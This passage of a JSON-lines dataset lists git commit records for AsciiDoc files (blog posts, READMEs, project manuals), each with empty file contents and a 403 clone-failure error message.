403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08d7348efe3ba7088d3b9d10b6002437c5098e76","subject":"y2b create post The Music of Unbox Therapy","message":"y2b create post The Music of Unbox Therapy","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-27-The-Music-of-Unbox-Therapy.adoc","new_file":"_posts\/2012-01-27-The-Music-of-Unbox-Therapy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04929a38b4982ffbe95034e8b6cc98820eca5337","subject":"add fields documentation generated by script","message":"add fields documentation generated by script\n","repos":"TheStigger\/dockerbeat,TheStigger\/dockerbeat,erwanncloarec\/dockerbeat,erwanncloarec\/dockerbeat","old_file":"doc\/fields.asciidoc","new_file":"doc\/fields.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erwanncloarec\/dockerbeat.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"78574627e951f97e5a7ff53c7e9e014fd7bce283","subject":"Update 2017-09-30-Log-collection-in-AWS-land.adoc","message":"Update 2017-09-30-Log-collection-in-AWS-land.adoc","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2017-09-30-Log-collection-in-AWS-land.adoc","new_file":"_posts\/2017-09-30-Log-collection-in-AWS-land.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7875c536b395639617f8d10d88bc8a6f77933658","subject":"Update 2015-11-25-Two-sides-of-the-same-coin.adoc","message":"Update 2015-11-25-Two-sides-of-the-same-coin.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-11-25-Two-sides-of-the-same-coin.adoc","new_file":"_posts\/2015-11-25-Two-sides-of-the-same-coin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"010d7ace29222a570f3798a1b333fdca77f74cae","subject":"y2b create post And Then It Began Floating...","message":"y2b create post And Then It Began Floating...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-04-And-Then-It-Began-Floating.adoc","new_file":"_posts\/2016-06-04-And-Then-It-Began-Floating.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"183a2d8f194116e4161ff40a74dee86a8c70c54a","subject":"fix manual to reflect reality of depfile cleaning","message":"fix manual to reflect reality of depfile cleaning\n\nFixes issue #362.\n","repos":"nico\/ninja,chenyukang\/ninja,dendy\/ninja,sxlin\/dist_ninja,chenyukang\/ninja,jendrikillner\/ninja,nickhutchinson\/ninja,ignatenkobrain\/ninja,jendrikillner\/ninja,nicolasdespres\/ninja,dorgonman\/ninja,curinir\/ninja,dendy\/ninja,metti\/ninja,lizh06\/ninja,jhanssen\/ninja,guiquanz\/ninja,jimon\/ninja,ctiller\/ninja,autopulated\/ninja,pathscale\/ninja,pck\/ninja,vvvrrooomm\/ninja,mgaunard\/ninja,mutac\/ninja,nocnokneo\/ninja,nico\/ninja,bradking\/ninja,tfarina\/ninja,kissthink\/ninja,jendrikillner\/ninja,jimon\/ninja,mutac\/ninja,mohamed\/ninja,rnk\/ninja,synaptek\/ninja,Ju2ender\/ninja,dpwright\/ninja,atetubou\/ninja,LuaDist\/ninja,atetubou\/ninja,lizh06\/ninja,pathscale\/ninja,autopulated\/ninja,dpwright\/ninja,glensc\/ninja,purcell\/ninja,yannicklm\/ninja,colincross\/ninja,mutac\/ninja,nocnokneo\/ninja,LuaDist\/ninja,bmeurer\/ninja,Ju2ender\/ninja,ndsol\/subninja,liukd\/ninja,glensc\/ninja,LuaDist\/ninja,nafest\/ninja,ndsol\/subninja,Qix-\/ninja,sgraham\/ninja,pck\/ninja,synaptek\/ninja,rjogrady\/ninja,atetubou\/ninja,metti\/ninja,jsternberg\/ninja,jhanssen\/ninja,dorgonman\/ninja,ninja-build\/ninja,automeka\/ninja,mgaunard\/ninja,LuaDist\/ninja,fifoforlifo\/ninja,barak\/ninja,maruel\/ninja,yannicklm\/ninja,lizh06\/ninja,mohamed\/ninja,yannicklm\/ninja,kissthink\/ninja,metti\/ninja,AoD314\/ninja,fifoforlifo\/ninja,guiquanz\/ninja,ikarienator\/ninja,nocnokneo\/ninja,Maratyszcza\/ninja-pypi,dendy\/ninja,dabrahams\/ninja,curinir\/ninja,kimgr\/ninja,ilor\/ninja,kimgr\/ninja,sxlin\/dist_ninja,moroten\/ninja,maruel\/ninja,pathscale\/ninja,kissthink\/ninja,sorbits\/ninja,jsternberg\/ninja,ignatenkobrain\/ninja,fuchsia-mirror\/third_party-ninja,TheOneRing\/ninja,nico\/ninja,bradking\/ninja,syntheticpp\/ninja,rjogrady\/ninja,martine\/ninja,liukd\/ninja,sxlin\/dist_ninja,mdempsky\/ninja,TheOneRing\/ninja,colincross\/ninja,hnney\/ninja,nicolasdespres\/ninja,autopulated\/ninja,kissthink\/ninja,curinir\/ninja,mdempsky\/ninja,mydongistiny\/ninja,guiquanz\/ninja,ilor\/ninja,Ju2ender\/ninja,sorbits\/ninja,guiquanz\/ninja,TheOneRing\/ninja,sorbits\/ninja,Maratyszcza\/ninja-pypi,nickhutchinson\/ninja,rnk\/ninja,nafest\/ninja,rjogrady\/ninja,tfarina\/ninja,vvvrrooomm\/ninja,syntheticpp\/ninja,ikarienator\/ninja,drbo\/ninja,mdempsky\/ninja,mutac\/ninja,mgaunard\/ninja,autopulated\/ninja,synaptek\/ninja,Qix-\/ninja,automeka\/ninja,dpwright\/ninja,dabrahams\/ninja,mohamed\/ninja,Ju2ender\/ninja,nafest\/ninja,hnney\/ninja,moroten\/ninja,okuoku\/ninja,ikarienator\/ninja,ignatenkobrain\/ninja,nicolasdespres\/ninja,iwadon\/ninja,nickhutchinson\/ninja,dabrahams\/ninja,mgaunard\/ninja,juntalis\/ninja,fuchsia-mirror\/third_party-ninja,fuchsia-mirror\/third_party-ninja,fuchsia-mirror\/third_party-ninja,mohamed\/ninja,TheOneRing\/ninja,sgraham\/ninja,ctiller\/ninja,vvvrrooomm\/ninja,iwadon\/ninja,kimgr\/ninja,jsternberg\/ninja,jhanssen\/ninja,rnk\/ninja,drbo\/ninja,purcell\/ninja,okuoku\/ninja,Maratyszcza\/ninja-pypi,pck\/ninja,colincross\/ninja,ThiagoGarciaAlves\/ninja,dorgonman\/ninja,pck\/ninja,mydongistiny\/ninja,mydongistiny\/ninja,chenyukang\/ninja,purcell\/ninja,chenyukang\/ninja,martine\/ninja,jhanssen\/ninja,automeka\/ninja,ctiller\/ninja,liukd\/ninja,nickhutchinson\/ninja,ninja-build\/ninja,jimon\/ninja,ThiagoGarciaAlves\/ninja,tfarina\/ninja,ThiagoGarciaAlves\/ninja,moroten\/ninja,liukd\/ninja,drbo\/ninja,bradking\/ninja,hnney\/ninja,glensc\/ninja,ninja-build\/ninja,moroten\/ninja,ThiagoGarciaAlves\/ninja,lizh06\/ninja,sgraham\/ninja,yannicklm\/ninja,maruel\/ninja,atetubou\/ninja,mydongistiny\/ninja,AoD314\/ninja,jendrikillner\/ninja,dendy\/ninja,sxlin\/dist_ninja,ndsol\/subninja,ikarienator\/ninja,bmeurer\/ninja,hnney\/ninja,jsternberg\/ninja,okuoku\/ninja,AoD314\/ninja,jimon\/ninja,rjogrady\/ninja,ignatenkobrain\/ninja,automeka\/ninja,pathscale\/ninja,nafest\/ninja,barak\/ninja,AoD314\/ninja,sxlin\/dist_ninja,nicolasdespres\/ninja,dabrahams\/ninja,synaptek\/ninja,martine\/ninja,barak\/ninja,bradking\/ninja,juntalis\/ninja,iwadon\/ninja,ilor\/ninja,iwadon\/ninja,sxlin\/dist_ninja,fifoforlifo\/ninja,fifoforlifo\/ninja,mdempsky\/ninja,Maratyszcza\/ninja-pypi,rnk\/ninja,bmeurer\/ninja,sxlin\/dist_ninja,maruel\/ninja,ninja-build\/ninja,colincross\/ninja,syntheticpp\/ninja,sorbits\/ninja,dpwright\/ninja,sgraham\/ninja,syntheticpp\/ninja,okuoku\/ninja,Qix-\/ninja,juntalis\/ninja,purcell\/ninja,glensc\/ninja,kimgr\/ninja,barak\/ninja,nocnokneo\/ninja,curinir\/ninja,vvvrrooomm\/ninja,juntalis\/ninja,ctiller\/ninja,Qix-\/ninja,nico\/ninja,drbo\/ninja,dorgonman\/ninja,ilor\/ninja,metti\/ninja,ndsol\/subninja,martine\/ninja,bmeurer\/ninja,tfarina\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lizh06\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"576f137555778695c3a0d3d1d890d4eedefff265","subject":"Update 2015-03-28-Strong-Viking-Mud-Edition.adoc","message":"Update 2015-03-28-Strong-Viking-Mud-Edition.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-03-28-Strong-Viking-Mud-Edition.adoc","new_file":"_posts\/2015-03-28-Strong-Viking-Mud-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cdfbd7203a62ef66a9bc67c903b079e6a61d9df","subject":"Renamed '_posts\/2017-09-24-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc' to '_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc'","message":"Renamed '_posts\/2017-09-24-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc' to '_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc'","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad07486a5574acababe30d4263e7569679f871ba","subject":"Update 2017-06-10-Conversion-between-View-Space-Linear-and-Screen-Space-Linear.adoc","message":"Update 2017-06-10-Conversion-between-View-Space-Linear-and-Screen-Space-Linear.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2017-06-10-Conversion-between-View-Space-Linear-and-Screen-Space-Linear.adoc","new_file":"_posts\/2017-06-10-Conversion-between-View-Space-Linear-and-Screen-Space-Linear.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd56e51c12ac942a8b218dc3f6525b9d50532201","subject":"HAWKULAR-1094 - Updated the release instructions.","message":"HAWKULAR-1094 - Updated the release instructions.\n","repos":"hawkular\/hawkular-services,hawkular\/hawkular-services","old_file":"RELEASE.adoc","new_file":"RELEASE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3bda8336068fedb28564c6ab04b6dea31ad22e74","subject":"Document development practices.","message":"Document development practices.\n\nSigned-off-by: Jere Lepp\u00e4nen <14957520de8d9815e0c353a07fe23c737f0171e9@nokia.com>\nReviewed-by: Sorin Vultureanu <8013ba55f8675034bc2ab0d6c3a1c9650437ca36@enea.com>\nReviewed-by: Brian Brooks <8e906ed46ccdc37d68771658f0f8f8740a374927@linaro.org>\n","repos":"OpenFastPath\/ofp,TolikH\/ofp,TolikH\/ofp,OpenFastPath\/ofp,TolikH\/ofp,OpenFastPath\/ofp,OpenFastPath\/ofp","old_file":"docs\/development-practices.adoc","new_file":"docs\/development-practices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TolikH\/ofp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"50931e291188000d0caf0493f39b1e4a395e1243","subject":"docs: improvements to transaction semantics","message":"docs: improvements to transaction semantics\n\nChange-Id: I23a2751923a4214f52e6cdb233f7e3aeee207da2\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9235\nReviewed-by: David Ribeiro Alves <dbbafdb4f25eb0c1ff3facf0e5f2f27705055af1@gmail.com>\nTested-by: Kudu Jenkins\n","repos":"InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu","old_file":"docs\/transaction_semantics.adoc","new_file":"docs\/transaction_semantics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b9dc3811a0b2563cb7ca7fa7a9bff2aa59390bd","subject":"Update 2015-09-09-Error-retrieving-parent-for-item-No-resource-found-that-matches-the-given-name-after-upgrading-to-AppCompat-v23.adoc","message":"Update 2015-09-09-Error-retrieving-parent-for-item-No-resource-found-that-matches-the-given-name-after-upgrading-to-AppCompat-v23.adoc","repos":"harichen\/harichen.io,harichen\/harichen.io,harichen\/harichen.io","old_file":"_posts\/2015-09-09-Error-retrieving-parent-for-item-No-resource-found-that-matches-the-given-name-after-upgrading-to-AppCompat-v23.adoc","new_file":"_posts\/2015-09-09-Error-retrieving-parent-for-item-No-resource-found-that-matches-the-given-name-after-upgrading-to-AppCompat-v23.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harichen\/harichen.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a89c6f4009767bbd96e518f5f605c410165d186c","subject":"y2b create post Xbox 360 Messenger Kit Unboxing","message":"y2b create post Xbox 360 Messenger Kit Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-03-Xbox-360-Messenger-Kit-Unboxing.adoc","new_file":"_posts\/2011-10-03-Xbox-360-Messenger-Kit-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3caf2b9429b865efbce757288b555c15ed966f2","subject":"Update 2016-04-13-M-I-T-M.adoc","message":"Update 2016-04-13-M-I-T-M.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-13-M-I-T-M.adoc","new_file":"_posts\/2016-04-13-M-I-T-M.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58a6214fb849e3cbbe766a099970e90cc286b791","subject":"y2b create post The Last Game My Dad Ever Played\u2026","message":"y2b create post The Last Game My Dad Ever Played\u2026","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-17-The-Last-Game-My-Dad-Ever-Played.adoc","new_file":"_posts\/2017-02-17-The-Last-Game-My-Dad-Ever-Played.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88b176d5e52e8b3a0c09fe289b6d886f066d0a79","subject":"y2b create post The Worst Gadget EVER On Unbox Therapy...","message":"y2b create post The Worst Gadget EVER On Unbox Therapy...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-19-TheWorstGadgetEVEROnUnboxTherapy.adoc","new_file":"_posts\/2018-02-19-TheWorstGadgetEVEROnUnboxTherapy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1be69f7689228f294236195c88d94de864b508c","subject":"Update 2015-09-21-Aceess-Control.adoc","message":"Update 2015-09-21-Aceess-Control.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-Aceess-Control.adoc","new_file":"_posts\/2015-09-21-Aceess-Control.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11e3a43e31a162fcad24675f6f6fc89f61238846","subject":"Update 2018-11-27-Hugo-Ascii-Doc.adoc","message":"Update 2018-11-27-Hugo-Ascii-Doc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Hugo-Ascii-Doc.adoc","new_file":"_posts\/2018-11-27-Hugo-Ascii-Doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37f67d9e21bd76cc06b2feccbeb3f5ffaf5bd25b","subject":"[Docs]\u00a0Fix typo in circuit breaker docs (#29659)","message":"[Docs]\u00a0Fix typo in circuit breaker docs (#29659)\n\nThe previous description had a part that didn't fit and was probably\r\nfrom a copy\/paste of the in flight requests description above.","repos":"robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/reference\/modules\/indices\/circuit_breaker.asciidoc","new_file":"docs\/reference\/modules\/indices\/circuit_breaker.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"36bc9f82365adacdc411a4f00c78e4f62481bf53","subject":"add required RPM repos for RHEL install","message":"add required RPM repos for RHEL install\n\nadd required RPM repos for RHEL install\n","repos":"redhat-openstack\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack,markllama\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-openstack\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e242129d4a6ff3884b2206bc03b90e107601f96d","subject":"Added README","message":"Added README\n","repos":"danielsoro\/zoraide-food-system","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danielsoro\/zoraide-food-system.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6940abd934b1b37cb513e6eddffa0dde91a8a26f","subject":"Updated the README","message":"Updated the README\n","repos":"chlewe\/strawpoll,chlewe\/strawpoll","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chlewe\/strawpoll.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff461f26dd21455b26ab8ded2521e8e9364b6901","subject":"Readme added","message":"Readme added\n","repos":"kromkrom\/csv-dict-parser","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kromkrom\/csv-dict-parser.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d15221a178684a08ef1a842df4a65960962f9d5","subject":"y2b create post Watch From The FUTURE - TokyoFlash Kisai Stencil Watch Unboxing","message":"y2b create post Watch From The FUTURE - TokyoFlash Kisai Stencil Watch Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-04-11-Watch-From-The-FUTURE--TokyoFlash-Kisai-Stencil-Watch-Unboxing.adoc","new_file":"_posts\/2012-04-11-Watch-From-The-FUTURE--TokyoFlash-Kisai-Stencil-Watch-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd79cc1d8682f58c0fe9b81802d80b615a3fa7bd","subject":"Link added.","message":"Link added.\n","repos":"ncoelle\/quartzdemo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ncoelle\/quartzdemo.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbe00e7cb7320fdf793687fe3a4b3a6926d6133b","subject":"Update README","message":"Update README\n","repos":"pjanouch\/desktop-tools,pjanouch\/desktop-tools,pjanouch\/desktop-tools","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/desktop-tools.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"db62d47be585fdd4367ce891914b1628ff027983","subject":"disable code quality badge until enabled","message":"disable code quality badge until enabled\n","repos":"bitnami\/middleman-asciidoc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitnami\/middleman-asciidoc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e0db2b5455aa4eb694a5edcebf9c5edc16af71e","subject":"add readme.adoc","message":"add readme.adoc\n","repos":"tedbergeron\/tedbergeron.github.io,tedbergeron\/tedbergeron.github.io,tedbergeron\/tedbergeron.github.io,tedbergeron\/tedbergeron.github.io","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tedbergeron\/tedbergeron.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"825ccbaa9130815ebdead83b20bf0fa66f922b0c","subject":"Add archive text to README.adoc","message":"Add archive text to README.adoc\n","repos":"spring-projects\/rest-shell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/rest-shell.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3218491e0970e3df33ec3e1ddd5602e189fbe9eb","subject":"Deleted 2016-6-26-PHRER.adoc","message":"Deleted 2016-6-26-PHRER.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-PHRER.adoc","new_file":"2016-6-26-PHRER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a6fa7fccd744df022a3ab23e04808fdfedc693c","subject":"code of conduct","message":"code of conduct\n","repos":"spring-cloud-stream-app-starters\/app-starters-release,spring-cloud-stream-app-starters\/app-starters-release","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud-stream-app-starters\/app-starters-release.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4efc4b6e25bd5856a0c511f7bcbb667c268426f5","subject":"Fix link","message":"Fix link\n","repos":"hwolf\/oauth2,hwolf\/oauth2,hwolf\/oauth2,hwolf\/oauth2","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hwolf\/oauth2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d3ba46fedc401dc54aabecf9c1fe4e9bd127b315","subject":"Readme: Add Waitress and remove mod_wsgi from WSGI server tips","message":"Readme: Add Waitress and remove mod_wsgi from WSGI server tips\n","repos":"jirutka\/change-password,zhangwei0181\/ldap-passwd-webui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jirutka\/change-password.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e09d914eac6f8dd570d59f0054f65ad189f54a25","subject":"PLATSERV-184: Comentada la secci\u00f3n de los repositorios Maven","message":"PLATSERV-184: Comentada la secci\u00f3n de los repositorios Maven\n","repos":"serenity-devstack\/spring-cloud-services-connector","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/serenity-devstack\/spring-cloud-services-connector.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5a81154d1ebadcdedfec1735bdb018305607cdca","subject":"Add README.adoc","message":"Add README.adoc\n","repos":"10sr\/machine-setups,10sr\/server-provisions,10sr\/server-provisions,10sr\/machine-setups,10sr\/machine-setups,10sr\/machine-setups","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/10sr\/machine-setups.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"88a2e5d8d488f390f84cf33ad3a0505d767373ec","subject":"\u66f4\u65b0 README.adoc \u6587\u6863","message":"\u66f4\u65b0 README.adoc 